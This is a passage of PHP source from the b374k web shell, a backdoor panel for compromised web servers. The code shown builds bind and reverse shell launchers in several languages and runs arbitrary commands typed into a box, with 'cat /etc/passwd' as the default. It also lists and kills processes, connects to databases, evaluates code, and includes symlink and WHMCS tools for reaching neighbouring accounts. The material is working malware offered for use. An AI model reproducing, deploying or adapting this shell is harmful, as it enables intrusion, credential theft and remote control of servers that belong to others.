2482. $s_result .= "<div class='mybox'><h2>".$s_sqltitle."</h2>
2483. <form action='".$s_self."' method='post' />
2484. <table class='myboxtbl'>
2485. <tr><td style='width:170px;'>DB File</td><td><input style='width:100%;' class='inputz' type='text' name='sqlhost' value='' /></td></tr>
2486. </table>
2487. <input type='submit' name='connect' class='inputzbut' value='Connect !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
2488. <input type='hidden' name='sqltype' value='".$s_sql['type']."' />
2489. <input type='hidden' name='sqlinit' value='init' />
2490. <input type='hidden' name='x' value='db' />
2491. </form>
2492. </div>";
2493. }
2494. else{
2495. $s_result .= "<div class='mybox'><h2>".$s_sqltitle."</h2>
2496. <form action='".$s_self."' method='post' />
2497. <table class='myboxtbl'>
2498. <tr><td style='width:170px;'>Host</td><td><input style='width:100%;' class='inputz' type='text' name='sqlhost' value='' /></td></tr>
2499. <tr><td>Username</td><td><input style='width:100%;' class='inputz' type='text' name='sqluser' value='' /></td></tr>
2500. <tr><td>Password</td><td><input style='width:100%;' class='inputz' type='password' name='sqlpass' value='' /></td></tr>
2501. <tr><td>Port (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='sqlport' value='' /></td></tr>
2502. </table>
2503. <input type='submit' name='connect' class='inputzbut' value='Connect !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
2504. <input type='hidden' name='sqltype' value='".$s_sql['type']."' />
2505. <input type='hidden' name='sqlinit' value='init' />
2506. <input type='hidden' name='x' value='db' />
2507. </form>
2508. </div>";
2509. }
2510. }
2511.  
2512. }
2513. } // bind and reverse shell
2514. elseif(isset($_REQUEST['x']) && ($_REQUEST['x']=='rs')){
2515. //$s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
2516. //$s_my_ip = $_SERVER['REMOTE_ADDR'];
2517. $s_rshost = $s_server_ip;
2518.  
2519. $s_rsport = "13123";
2520. // resources $s_rs_pl $s_rs_py $s_rs_rb $s_rs_js $s_rs_c $s_rs_java $s_rs_win
2521. $s_rspesana = "Press &#39; Go ! &#39; button and run &#39; nc <i>server_ip</i> <i>port</i> &#39; on your computer";
2522. $s_rspesanb = "Run &#39; nc -l -v -p <i>port</i> &#39; on your computer and press &#39; Go ! &#39; button";
2523.  
2524. //bind_pl bind_py bind_rb bind_c bind_win bind_php back_pl back_py back_rb back_c back_win back_php
2525.  
2526. $s_rsbind = array();
2527. $s_rsback = array();
2528.  
2529.  
2530. $s_rsbind["bind_php"] = "Bind Shell <span class='desc' style='font-size:12px;'>- php</span>";
2531. $s_rsback["back_php"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- php</span>";
2532.  
2533. if($s_perl){
2534. $s_rsbind["bind_pl"] = "Bind Shell <span class='desc' style='font-size:12px;'>- perl</span>";
2535. $s_rsback["back_pl"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- perl</span>";
2536. }
2537. if($s_python){
2538. $s_rsbind["bind_py"] = "Bind Shell <span class='desc' style='font-size:12px;'>- python</span>";
2539. $s_rsback["back_py"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- python</span>";
2540. }
2541. if($s_ruby){
2542. $s_rsbind["bind_rb"] = "Bind Shell <span class='desc' style='font-size:12px;'>- ruby</span>";
2543. $s_rsback["back_rb"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- ruby</span>";
2544. }
2545. if($s_node){
2546. $s_rsbind["bind_js"] = "Bind Shell <span class='desc' style='font-size:12px;'>- node</span>";
2547. $s_rsback["back_js"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- node</span>";
2548. }
2549. if($s_java){
2550. $s_rsbind["bind_java"] = "Bind Shell <span class='desc' style='font-size:12px;'>- java</span>";
2551. $s_rsback["back_java"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- java</span>";
2552. }
2553. if($s_win){
2554. $s_rsbind["bind_win"] = "Bind Shell <span class='desc' style='font-size:12px;'>- windows executable</span>";
2555. $s_rsback["back_win"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- windows executable</span>";
2556. }
2557. else{
2558. $s_rsbind["bind_c"] = "Bind Shell <span class='desc' style='font-size:12px;'>- c</span>";
2559. $s_rsback["back_c"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- c</span>";
2560. }
2561.  
2562. $s_rslist = array_merge($s_rsbind,$s_rsback);
2563.  
2564. if(!is_writable($s_cwd)) $s_result .= "<p class='notif'>Directory ".$s_cwd." is not writable, please change to a writable one</p>";
2565. $s_rs_err = "";
2566. foreach($s_rslist as $s_rstype=>$s_rstitle){
2567. $s_split = explode("_",$s_rstype);
2568. if($s_split[0]=="bind"){
2569. $s_rspesan = $s_rspesana;
2570. $s_rsdisabled = "disabled='disabled'";
2571. $s_rstarget = $s_server_ip;
2572. $s_labelip = "Server IP";
2573. }
2574. elseif($s_split[0]=="back"){
2575. $s_rspesan = $s_rspesanb;
2576. $s_rsdisabled = "";
2577. $s_rstarget = $s_my_ip;
2578. $s_labelip = "Target IP";
2579. }
2580. if(isset($_REQUEST[$s_rstype])){
2581. if(isset($_REQUEST["rshost_".$s_rstype])) $s_rshost_ = ss($_REQUEST["rshost_".$s_rstype]);
2582. if(isset($_REQUEST["rsport_".$s_rstype])) $s_rsport_ = ss($_REQUEST["rsport_".$s_rstype]);
2583.  
2584. if($s_split[0]=="bind") $s_rstarget_packed = $s_rsport_;
2585. elseif($s_split[0]=="back") $s_rstarget_packed = $s_rsport_." ".$s_rshost_;
2586.  
2587. if($s_split[1]=="pl") $s_rscode = $s_rs_pl;
2588. elseif($s_split[1]=="py") $s_rscode = $s_rs_py;
2589. elseif($s_split[1]=="rb") $s_rscode = $s_rs_rb;
2590. elseif($s_split[1]=="js") $s_rscode = $s_rs_js;
2591. elseif($s_split[1]=="c") $s_rscode = $s_rs_c;
2592. elseif($s_split[1]=="java") $s_rscode = $s_rs_java;
2593. elseif($s_split[1]=="win") $s_rscode = $s_rs_win;
2594. elseif($s_split[1]=="php") $s_rscode = $s_rs_php;;
2595. $s_buff = rs($s_rstype,$s_rstarget_packed,$s_rscode);
2596. if($s_buff!="") $s_rs_err = "<p class='notif'>".hss($s_buff)."</p>";
2597. }
2598. $s_result .= "<div class='mybox'><h2>".$s_rstitle."</h2>
2599. <form action='".$s_self."' method='post' />
2600. <table class='myboxtbl'>
2601. <tr><td style='width:100px;'>".$s_labelip."</td><td><input ".$s_rsdisabled." style='width:100%;' class='inputz' type='text' name='rshost_".$s_rstype."' value='".$s_rstarget."' /></td></tr>
2602. <tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='rsport_".$s_rstype."' value='".$s_rsport."' /></td></tr>
2603. </table>
2604. <input type='submit' name='".$s_rstype."' class='inputzbut' value='Go !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
2605. &nbsp;&nbsp;<span>".$s_rspesan."</span>
2606. <input type='hidden' name='x' value='rs' />
2607. </form>
2608. </div>";
2609. }
2610. $s_result = $s_rs_err.$s_result;
2611. } // task manager
2612. elseif(isset($_REQUEST['x']) && ($_REQUEST['x']=='ps')){
2613. $s_buff = "";
2614. // kill process specified by pid
2615. if(isset($_REQUEST['pid'])){
2616. $s_p = trim(ss($_REQUEST['pid']),"|");
2617. $s_parr = explode("|", $s_p);
2618.  
2619. foreach($s_parr as $s_p){
2620. if(function_exists("posix_kill")) $s_buff .= (posix_kill($s_p,'9'))? "<p class='notif'>Process with pid ".$s_p." has been successfully killed</p>":"<p class='notif'>Unable to kill process with pid ".$s_p."</p>";
2621. else{
2622. if(!$s_win) $s_buff .= "<p class='notif'>".exe("kill -9 ".$s_p)."</p>";
2623. else $s_buff .= "<p class='notif'>".exe("taskkill /F /PID ".$s_p)."</p>";
2624. }
2625. }
2626. }
2627.  
2628. if(!$s_win) $s_h = "ps aux";
2629. else $s_h = "tasklist /V /FO csv";
2630. $s_wcount = 11;
2631. $s_wexplode = " ";
2632. if($s_win) $s_wexplode = "\",\"";
2633.  
2634. $s_res = exe($s_h);
2635. if(trim($s_res)=='') $s_result = "<p class='notif'>Error getting process list</p>";
2636. else{
2637. if($s_buff!="") $s_result = $s_buff;
2638. $s_result .= "<table class='explore sortable'>";
2639. if(!$s_win) $s_res = preg_replace('#\ +#',' ',$s_res);
2640.  
2641. $s_psarr = explode("\n",$s_res);
2642. $s_fi = true;
2643. $s_tblcount = 0;
2644.  
2645. $s_check = explode($s_wexplode,$s_psarr[0]);
2646. $s_wcount = count($s_check);
2647.  
2648. foreach($s_psarr as $s_psa){
2649. if(trim($s_psa)!=''){
2650. if($s_fi){
2651. $s_fi = false;
2652. $s_psln = explode($s_wexplode,$s_psa,$s_wcount);
2653. $s_result .= "<tr><th style='width:24px;' class='sorttable_nosort'></th><th class='sorttable_nosort'>action</th>";
2654. foreach($s_psln as $s_p) $s_result .= "<th>".trim(trim(strtolower($s_p)),"\"")."</th>";
2655. $s_result .= "</tr>";
2656. }
2657. else{
2658. $s_psln = explode($s_wexplode,$s_psa,$s_wcount);
2659. $s_result .= "<tr>";
2660. $s_tblcount = 0;
2661. foreach($s_psln as $s_p){
2662. $s_pid = trim(trim($s_psln[1]),"\"");
2663. if(trim($s_p)=="") $s_p = "&nbsp;";
2664. if($s_tblcount == 0){
2665. $s_result .= "<td style='text-align:center;text-indent:4px;'><input id='".md5($s_pid)."' name='cbox' value='".$s_pid."' type='checkbox' class='css-checkbox' onchange='hilite(this);' /><label for='".md5($s_pid)."' class='css-label'></label></td><td style='text-align:center;'><a href='".$s_self."x=ps&pid=".$s_pid."' onclick='return false;'>kill</a></td>
2666. <td style='text-align:center;'>".trim(trim($s_p),"\"")."</td>";
2667. $s_tblcount++;
2668. }
2669. else{
2670. $s_tblcount++;
2671. if($s_tblcount == count($s_psln)) $s_result .= "<td style='text-align:left;'>".trim(trim($s_p),"\"")."</td>";
2672. else $s_result .= "<td style='text-align:center;'>".trim(trim($s_p),"\"")."</td>";
2673. }
2674. }
2675. $s_result .= "</tr>";
2676. }
2677. }
2678. }
2679. $colspan = count($s_psln)+1;
2680. $s_result .= "<tfoot><tr class='cbox_selected'><td class='cbox_all'>
2681. <form action='".$s_self."' method='post'>
2682. <input id='checkalll' type='checkbox' name='abox' class='css-checkbox' onclick='checkall();' />
2683. <label for='checkalll' class='css-label'></label>
2684. </form>
2685. </td><td style='text-indent:10px;padding:2px;' colspan=".$colspan."><a href='javascript: pkill();' onclick='return false;'>kill selected</a></td>
2686. </tr></tfoot></table>";
2687. }
2688. }
2689. else{
2690. if(isset($_REQUEST['cmd'])){
2691. $s_cmd = ss($_REQUEST['cmd']);
2692. if(strlen($s_cmd) > 0){
2693. if(preg_match('#^cd(\ )+(.*)#',$s_cmd,$s_r)){
2694. $s_nd = trim($s_r[2]);
2695. if(is_dir($s_nd)){
2696. chdir($s_nd);
2697. $s_cwd = cp(getcwd());
2698. setcookie("cwd", $s_cwd ,time() + $s_login_time);
2699. $s_result .= showdir($s_cwd);
2700. }
2701. elseif(is_dir($s_cwd.$s_nd)){
2702. chdir($s_cwd.$s_nd);
2703. $s_cwd = cp(getcwd());
2704. setcookie("cwd", $s_cwd ,time() + $s_login_time);
2705. $s_result .= showdir($s_cwd);
2706. }
2707. else $s_result .= "<p class='notif'>".$s_nd." is not a directory"."</p>";
2708. }
2709. else{
2710. $s_r = hss(exe($s_cmd));
2711. if($s_r != '') $s_result .= "<pre>".$s_r."</pre>";
2712. else $s_result .= showdir($s_cwd);
2713. }
2714. }
2715. else $s_result .= showdir($s_cwd);
2716. }
2717. else{
2718. $s_result .= showdir($s_cwd);
2719. }
2720. }
2721.  
2722. // find drive letters
2723. $s_letters = '';
2724. $s_v = explode("\\",$s_cwd);
2725. $s_v = $s_v[0];
2726. foreach (range("A","Z") as $s_letter){
2727. if(is_dir($s_letter.":\\") && is_readable($s_letter.":\\")){
2728. $s_letters .= "<a href='".$s_self."cd=".$s_letter.":\\' onclick='return false;'>[ ";
2729. if ($s_letter.":" != $s_v) {$s_letters .= $s_letter;}
2730. else {$s_letters .= "<span class='drive-letter'>".$s_letter."</span>";}
2731. $s_letters .= " ]</a> ";
2732. }
2733. }
2734.  
2735. // print useful info
2736. $s_info = "<table class='headtbl'><tr><td>".$s_system."</td></tr>";
2737. $s_info .= "<tr><td>".$s_software."</td></tr>";
2738. $s_info .= "<tr><td>server ip : ".$s_server_ip."<span class='gaya'> | </span>your ip : ".$s_my_ip;
2739. $s_info .= "<span class='gaya'> | </span> Time @ Server : ".@date("d M Y H:i:s",time());
2740. $s_info .= "
2741. </td></tr>
2742. <tr><td style='text-align:left;'>
2743. <table class='headtbls'><tr>
2744. <td>".trim($s_letters)."</td>
2745. <td>
2746. <span id='chpwd'>
2747. &nbsp;<a href=\"javascript:tukar('chpwd','chpwdform')\">
2748. <img height='16px' width='16px' src='".$s_favicon."' alt='Change' style='vertical-align:middle;margin:6px 0;border:0;' />
2749. &nbsp;&nbsp;</a>".swd($s_cwd)."</span>
2750. <form action='".$s_self."' method='post' style='margin:0;padding:0;'>
2751. <span class='sembunyi' id='chpwdform'>
2752. &nbsp;<a href=\"javascript:tukar('chpwdform','chpwd');\">
2753. <img height='16px' width='16px' src='".$s_favicon."' alt='Change' style='vertical-align:middle;margin:6px 0;border:0;' />
2754. </a>&nbsp;&nbsp;
2755. <input type='text' name='view' class='inputz' style='width:300px;' value='".$s_cwd."' />
2756. <input class='inputzbut' type='submit' name='submit' value='view file / folder' />
2757. </span>
2758. </form>
2759. </td></tr>
2760. </table>
2761. </td></tr>
2762. </table>";
2763.  
2764.  
2765. }
2766.  
2767. $s_error = ob_get_contents();
2768. if(!empty($s_error)) $s_result = "<p class='notif'>".$s_error."</p>".$s_result;
2769. ob_end_clean();
2770.  
2771. ?>
2772. <!DOCTYPE html>
2773. <html>
2774. <head>
2775. <title><?php echo $s_title; ?></title>
2776. <meta charset="utf-8">
2777. <meta name='robots' content='noindex, nofollow, noarchive'>
2778. <link rel='SHORTCUT ICON' href='<?php echo $s_favicon; ?>'>
2779. <link href='http://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700' rel='stylesheet' type='text/css'>
2780. <style type='text/css'>
2781. *{font-family:Ubuntu Mono,serif;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;}
2782. body{background:<?php echo $s_color[0];?>;font-size:12px;color:<?php echo $s_color[1];?>;font-weight:400;}
2783. hr{border:1px solid <?php echo $s_color[2];?>;}
2784. a{color:<?php echo $s_color[3];?>;text-decoration:none;}
2785. a:hover{color:<?php echo $s_color[1];?>;}
2786. pre{padding:0 8px;}
2787. form{display:inline;}
2788. table th,p{cursor:default;}
2789. #main{background:<?php echo $s_color[4];?>;-moz-border-radius:10px;border-radius:10px;width:100%;padding:2px 8px;}
2790. #header{text-align:left;margin:0;padding:0;}
2791. #header td{margin:0;padding:0;}
2792. #header h1{font-size:20px;-webkit-transform:rotate(-13.37deg);-moz-transform:rotate(-13.37deg);margin:0;padding:0;}
2793. #header h1 a,.explorelist:hover a{color:<?php echo $s_color[1];?>;}
2794. #menu{background:<?php echo $s_color[4];?>;margin:0 2px 4px;}
2795. #result{-moz-border-radius:10px;border-radius:10px;border:1px solid <?php echo $s_color[3];?>;line-height:16px;background:<?php echo $s_color[4];?>;color:<?php echo $s_color[5];?>;margin:0 0 8px;padding:4px 8px;}
2796. .headinfo{border-left:1px solid <?php echo $s_color[3];?>;margin:6px;padding:2px 0 0 16px;}
2797. .headtbls tr{height:24px;vertical-align:middle;}
2798. .gaya,.ver{color:<?php echo $s_color[3];?>;font-weight:700;}
2799. .ver{-webkit-transform:rotate(-13.37deg);-moz-transform:rotate(-13.37deg);letter-spacing:2px;}
2800. .menumi{background:<?php echo $s_color[6];?>;color:<?php echo $s_color[3];?>;text-decoration:none;letter-spacing:2px;font-size:12px;-webkit-transform:rotate(-13.37deg);-moz-transform:rotate(-13.37deg);-moz-border-radius:4px;border-radius:4px;margin:0;padding:4px 8px;}
2801. .menumi:hover{background:<?php echo $s_color[7];?>;-webkit-transform:rotate(13.37deg);-moz-transform:rotate(13.37deg);}
2802. .inputz,.prompt,.txtarea{background:<?php echo $s_color[4];?>;border:0;border-bottom:1px solid <?php echo $s_color[7];?>;font-size:12px;color:<?php echo $s_color[1];?>;padding:2px;}
2803. .prompt{font-weight:700;}
2804. .txtarea{width:100%;height:370px;}
2805. .inputzbut{font-size:12px;background:<?php echo $s_color[8];?>;color:<?php echo $s_color[3];?>;border:1px solid <?php echo $s_color[2];?>;margin:0 4px;}
2806. .explore{width:100%;padding:4px 0;}
2807. .explore a{text-decoration:none;}
2808. .explore td{border-bottom:1px solid <?php echo $s_color[2];?>;line-height:24px;vertical-align:top;padding:0 8px;}
2809. .explore th{font-weight:700;background:<?php echo $s_color[2];?>;padding:6px 8px;}
2810. .explore tr:hover{background:<?php echo $s_color[8];?>;}
2811. .sembunyi{display:none;margin:0;padding:0;}
2812. .info table{width:100%;border-radius:6px;border:1px solid <?php echo $s_color[3];?>;margin:4px 0;padding:8px;}
2813. .info th,th{background:<?php echo $s_color[8];?>;font-weight:700;}
2814. .info td{border-bottom:1px solid <?php echo $s_color[2];?>;}
2815. .info h2{text-align:center;font-size:15px;background:<?php echo $s_color[8];?>;letter-spacing:6px;border-radius:6px;border-bottom:1px solid <?php echo $s_color[3];?>;margin:4px 0 8px;padding:10px;}
2816. .info a{color:<?php echo $s_color[10];?>;}
2817. .viewfile{width:100%;border-bottom:1px solid <?php echo $s_color[2];?>;margin:0 0 4px;}
2818. .viewfile td{border-bottom:1px solid <?php echo $s_color[2];?>;background:<?php echo $s_color[8];?>;height:24px;padding:2px 4px;}
2819. .viewfilecontent{padding:11px 8px;}
2820. .mybox{-moz-border-radius:10px;border-radius:10px;border:1px solid <?php echo $s_color[3];?>;margin:4px 0 8px;padding:14px 8px;}
2821. .mybox h2{border-bottom:1px solid <?php echo $s_color[9];?>;color:<?php echo $s_color[3];?>;margin:0;padding:0 0 8px;}
2822. .notif{background:<?php echo $s_color[3];?>;color:<?php echo $s_color[0];?>;border-radius:6px;font-weight:700;margin:3px 0;padding:4px 8px 2px;}
2823. .notif a{color:<?php echo $s_color[0];?>;}
2824. .footer{text-align:right;font-size:10px;letter-spacing:2px;color:<?php echo $s_color[2];?>;padding:0 16px;}
2825. .headtbl,.myboxtbl{width:100%;}
2826. input[type=checkbox].css-checkbox + label.css-label{padding-left:20px;height:15px;display:inline-block;line-height:15px;background-repeat:no-repeat;background-position:0 0;vertical-align:middle;cursor:pointer;}
2827. input[type=checkbox].css-checkbox:checked + label.css-label{background-position:0 -15px;}
2828. .info,.info h1,.info hr,input[type=checkbox].css-checkbox{display:none;}
2829. .css-label{background-image:url(<?php echo $s_checkbox;?>);}
2830. .drive-letter{color:<?php echo $s_color[1];?>;}
2831. .desc{color:<?php echo $s_color[11];?>;}
2832. .cbox_selected{background-color:<?php echo $s_color[12];?>;}
2833. .cbox_all{text-align:center;text-indent:4px;}
2834. .schemabox{background-color:<?php echo $s_color[3];?>;border-radius:2px;}
2835. .border-bottom{border-bottom:1px solid <?php echo $s_color[7];?>;}
2836. .border-top{border-top:1px solid <?php echo $s_color[7];?>;}
2837. </style>
2838. </head><body>
2839. <table id='main'>
2840. <tr><td><?php if($s_auth){?><div>
2841. <span style='float:right;'>
2842. <a href='<?php echo $s_self; ?>x=logout' onclick='return false;' title='Click me to log out'>[ LOG OUT ]</a> | <a href='<?php echo $s_self;?>x=switch' onclick='return false;' title='Click me to change theme'>
2843. [ THEME ]</a></span>
2844.  
2845. <table id='header'><tr>
2846. <td style='width:100px;'>
2847. <table><tr>
2848. <td align='center'><h1><a href='<?php echo $s_self."cd=".cp(dirname(realpath($_SERVER['SCRIPT_FILENAME']))); ?>' onclick='return false;'>b374k</a></h1>
2849. v.<?php echo $s_ver; ?></td></tr>
2850. <tr><td align='center'><h1><div class='ver'> 4m4t3r45u</div></h1>
2851. </td></tr>
2852. </table>
2853. </td>
2854.  
2855. <td><div class='headinfo'><?php echo $s_info; ?></div></td>
2856. </tr></table></div>
2857.  
2858. <div style='clear:both;'></div>
2859.  
2860. <form method='post' name='g'></form>
2861. <div id='menu'>
2862. <table style='width:100%;'><tr>
2863. <td align='center'><a href='<?php echo $s_self; ?>' title='Explorer' onclick='return false;'>
2864. <div class='menumi'>Explore</div></a></td>
2865. <td align='center'> <a href='<?php echo $s_self; ?>x=jumping' title='Readable' onclick='return false;'>
2866. <div class='menumi'>Jumping</div></a></td>
2867. <td align='center'> <a href='<?php echo $s_self; ?>x=symlink' title='Symlink' onclick='return false;'>
2868. <div class='menumi'>Symlink</div></a></td>
2869. <td align='center'> <a href='<?php echo $s_self; ?>x=whmcs' title='Whmcs' onclick='return false;'>
2870. <div class='menumi'>Whmcs</div></a></td>
2871. <td align='center'> <a href='<?php echo $s_self; ?>x=ps' title='Display process status' onclick='return false;'>
2872. <div class='menumi'>Proccess</div></a></td>
2873. <td align='center'> <a href='<?php echo $s_self; ?>x=eval' title='Execute code' onclick='return false;'>
2874. <div class='menumi'>Eval</div></a></td>
2875. <td align='center'> <a href='<?php echo $s_self; ?>x=info' title='Information about server' onclick='return false;'>
2876. <div class='menumi'>Info</div></a></td>
2877. <td align='center'> <a href='<?php echo $s_self; ?>x=db' title='Connect to database' onclick='return false;'>
2878. <div class='menumi'>Mysql</div></a></td>
2879. <td align='center'> <a href='<?php echo $s_self; ?>x=rs' title='Remote Shell' onclick='return false;'>
2880. <div class='menumi'>Remote</div></a></td>
2881.  
2882. </td></tr></table></div>
2883. <div id='menu'><table><tr>
2884. <td style='width:100%;padding:0 0 0 6px;'> <form action='<?php echo $s_self; ?>' method='post'>
2885. <span class='prompt'><?php echo $s_prompt; ?></span>
2886. <input id='cmd' onclick="clickcmd();" class='inputz' type='text' name='cmd' style='width:70%;' value='<?php
2887. if(isset($_REQUEST['cmd'])) echo "";
2888. else echo "cat /etc/passwd";
2889. ?>' /><noscript>
2890. <input class='inputzbut' type='submit' value='Go !' name='submitcmd' style='width:80px;' />
2891. </noscript></form></td></tr></table>
2892. </div>
2893. <div id='content' id='box_shell'>
2894. <div id='result'><?php echo $s_result; ?></div>
2895. </div>
2896.  
2897. <?php }else{ ?>
2898. <div style='width:100%;text-align:center;'>
2899. <form action='<?php echo $s_self; ?>' method='post'>
2900. <img src='<?php echo $s_favicon; ?>' style='margin:2px;vertical-align:middle;' />
2901. <input id='login' class='inputz' type='password' name='login' style='width:120px;' value='' />
2902. <input class='inputzbut' type='submit' value='Go !' name='submitlogin' style='width:80px;' />
2903. </form></div>
2904.  
2905. <?php } ?>
2906. </td></tr></table>
2907. <p class='footer'>b374k ReCoD3d By Andripzf</p>
2908. <p class='footer'>Jayalah Indonesiaku &copy;<?php echo @date("Y",time())." "; ?>b374k Shell</p>
2909.  
2910. <script type='text/javascript'><?php echo gzinflate(base64_decode($s_sortable_js)); ?></script>
2911. <script type='text/javascript'>
2912. var d = document;
2913. var hexstatus = false;
2914. window.onload=function(){
2915. <?php if(isset($_REQUEST['cmd'])) echo "if(d.getElementById('cmd')) d.getElementById('cmd').focus();"; ?>
2916. <?php if(isset($_REQUEST['evalcode'])) echo "if(d.getElementById('evalcode')) d.getElementById('evalcode').focus();"; ?>
2917. <?php if(isset($_REQUEST['sqlcode'])) echo "if(d.getElementById('sqlcode')) d.getElementById('sqlcode').focus();"; ?>
2918. <?php if(isset($_REQUEST['login'])) echo "if(d.getElementById('login')) d.getElementById('login').focus();"; ?>
2919.  
2920. if(d.getElementById('cmd')) d.getElementById('cmd').setAttribute('autocomplete', 'off');
2921. var textareas = d.getElementsByTagName('textarea');
2922. var count = textareas.length;
2923. for(i=0;i<count;i++){
2924. textareas[i].onkeydown = function(e){
2925. if(e.keyCode==9){
2926. e.preventDefault();
2927. var s = this.selectionStart;
2928. this.value = this.value.substring(0,this.selectionStart) + "\t" + this.value.substring(this.selectionEnd);
2929. this.selectionEnd = s+1;
2930. }
2931. else if(e.ctrlKey && (e.keyCode == 10 || e.keyCode == 13)){
2932. this.form.submit();
2933. }
2934. }
2935. }
2936. listen();
2937. }
2938. function listen(){
2939. x = d.getElementsByTagName("a");
2940. for(i=0;i<x.length;i++){
2941. if(x[i].addEventListener) x[i].addEventListener ("mousedown", function(event){return go(this.href,event);},false);
2942. else x[i].attachEvent ("onmousedown", function(event){return go(this.href,event);});
2943. }
2944. }
2945. function go(t,evt){
2946. if(evt.which === 3 || evt.button === 2) return false;
2947.  
2948. ts = t.split('?');
2949. if(ts.length == 2){
2950. var a = ts[0];
2951. var v = ts[1];
2952. var vs = v.split('&');
2953. var g = d.forms['g'];
2954.  
2955. if(a=='') a='?';
2956. g.action = a;
2957. for(var i=0;i<vs.length;i++){
2958. var vss = vs[i].split('=');
2959. if(vss.length == 2){
2960. addinput(g,vss[0],vss[1]);
2961. }
2962. }
2963. g.submit();
2964. }
2965. else window.location = t;
2966. return false;
2967. }
2968. function tukar(l,b){
2969. if(d.getElementById(l)) d.getElementById(l).style.display = 'none';
2970. if(d.getElementById(b)) d.getElementById(b).style.display = 'block';
2971. if(d.getElementById(l + '_')) d.getElementById(l + '_').focus();
2972. }
2973. function toggle(b){
2974. if(d.getElementById(b)){
2975. if(d.getElementById(b).style.display == 'block') d.getElementById(b).style.display = 'none';
2976. else d.getElementById(b).style.display = 'block'
2977. }
2978. }
2979. function addinput(f,k,v){
2980. var i = d.createElement('input');
2981. i.type = 'hidden';
2982. i.name = k;
2983. i.value = v;
2984. f.appendChild(i);
2985. }
2986. function clickcmd(){
2987. var buff = d.getElementById('cmd');
2988. if(buff.value == '- shell command -') buff.value = '';
2989. }
2990. function download(what){
2991. what.form.submit();what.selectedIndex=0;
2992. }
2993. function hexfix(t,ev){
2994. var r = d.getElementById('hex_'+t);
2995. var q = d.getElementById('dump_'+t);
2996. var curpos = getcurpos(r);
2997.  
2998. if(ev.keyCode==13 || ev.keyCode==46 || ev.keyCode==8 || ev.keyCode==32) return false;
2999. //down
3000. if(ev.keyCode==40){
3001. var s = d.getElementById('hex_'+(parseInt(t)+1));
3002. if(s){clearpos();s.focus();setcurpos(s,curpos,curpos);}
3003. return false;
3004. }//up
3005. if(ev.keyCode==38){
3006. var s = d.getElementById('hex_'+(parseInt(t)-1));
3007. if(s){clearpos();s.focus();setcurpos(s,curpos,curpos);}
3008. return false;
3009. }
3010. }
3011. function hexupdate(t,ev){
3012. var r = d.getElementById('hex_'+t);
3013. var s = d.getElementById('dump_'+t);
3014. var k = String.fromCharCode(ev.keyCode);
3015. var a = '0123456789ABCDEF';
3016. var hexs = r.value;
3017. var hex = hexs.replace(/\s+/ig,'');
3018. var curpos = getcurpos(r);
3019.  
3020. clearpos();
3021. if(curpos%3!=2){
3022. if(a.indexOf(k)>=0 && curpos<hexs.length){
3023. chr = hexs.substr(curpos,1);
3024. before = (curpos>=1)? hexs.substr(0,curpos):'';
3025. after = (curpos<hexs.length)? hexs.substr(curpos+1):'';
3026. r.value = before + k + after;
3027. setcurpos(r,curpos+1,curpos+1);
3028. }
3029. }
3030. if(r && s){
3031. var str = '';
3032. hexs = r.value;
3033. hex = hexs.replace(/\s+/ig,'');
3034. for(var i=0;i<hex.length;i+=2) str += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
3035.  
3036. str = str.replace(/[^\x21-\x7E]/ig,'.');
3037. str = str.replace(/</ig,'.')
3038. str = str.replace(/>/ig,'.')
3039.  
3040. dmppos = Math.floor(curpos/3);
3041. chr = str.substr(dmppos,1);
3042. before = (dmppos>=1)? str.substr(0,dmppos):'';
3043. after = (dmppos<str.length)? str.substr(dmppos+1):'';
3044. finalstr = before + "<span class='gaya' style='background:#000;font-weight:bold;border-bottom:1px solid #fff;border-top:1px solid #fff;'>" + chr + "</span>" + after;
3045. s.innerHTML = finalstr;
3046. }
3047. }
3048. function submithex(){
3049. if(!hexstatus){
3050. hexstatus=true;
3051. var hexstr = '';
3052. var counter = d.getElementById('counter').value;
3053. for(var i=0;i<counter;i++){
3054. var hex = d.getElementById('hex_'+i);
3055. hexstr+=hex.value;
3056. hex.remove();
3057. }
3058. hexstr = hexstr.replace(/\s+/g,'');
3059. var hexestxtarea = d.getElementById('hexestxtarea');
3060. hexestxtarea.innerHTML = hexstr;
3061. hexestxtarea.form.submit();
3062. }
3063. }
3064. function evalselect(e){
3065. var a = d.getElementById('additionaloption');
3066. var b = d.getElementById('gccoption');
3067. if(a){
3068. if(e.value=='php') a.className='sembunyi';
3069. else a.className='';
3070. if(b) gccoption.value ='';
3071. }
3072. }
3073. function getcurpos(c){
3074. var p = 0;
3075. if(d.selection){
3076. c.focus ();
3077. var Sel = d.selection.createRange();
3078. Sel.moveStart ('character', c.value.length);
3079. p = Sel.text.length;
3080. }
3081. else if(c.selectionStart || c.selectionStart == '0')
3082. p = c.selectionStart;
3083. return p;
3084. }
3085. function setcurpos(c,p1,p2){
3086. if(c.setSelectionRange){
3087. c.focus();
3088. c.setSelectionRange(p1,p2);
3089. }
3090. else if(c.createTextRange){
3091. var r = c.createTextRange();
3092. r.collapse(true);
3093. r.moveStart('character', p1);
3094. r.moveEnd('character', p2);
3095. r.select();
3096. }
3097. }
3098. function clearpos(){
3099. var a = d.getElementsByName('hexdump');
3100. for(var i=0;i<a.length;i++){
3101. a[i].innerHTML = a[i].innerHTML.replace(/<[^>]+>/ig,'');
3102. }
3103. }
3104. function findtype(ty){
3105. var z = d.getElementById('type');
3106. if(z && (ty=='sdir')) z.selectedIndex = 1;
3107. else if(z && (ty=='sfile')) z.selectedIndex = 0;
3108. }
3109. function checkall(){
3110. var a = d.getElementsByName('cbox');
3111. var b = d.getElementsByName('abox');
3112. for(var i=0;i<a.length;i++){
3113. a[i].checked = b[0].checked;
3114. var c = a[i].parentElement.parentElement;
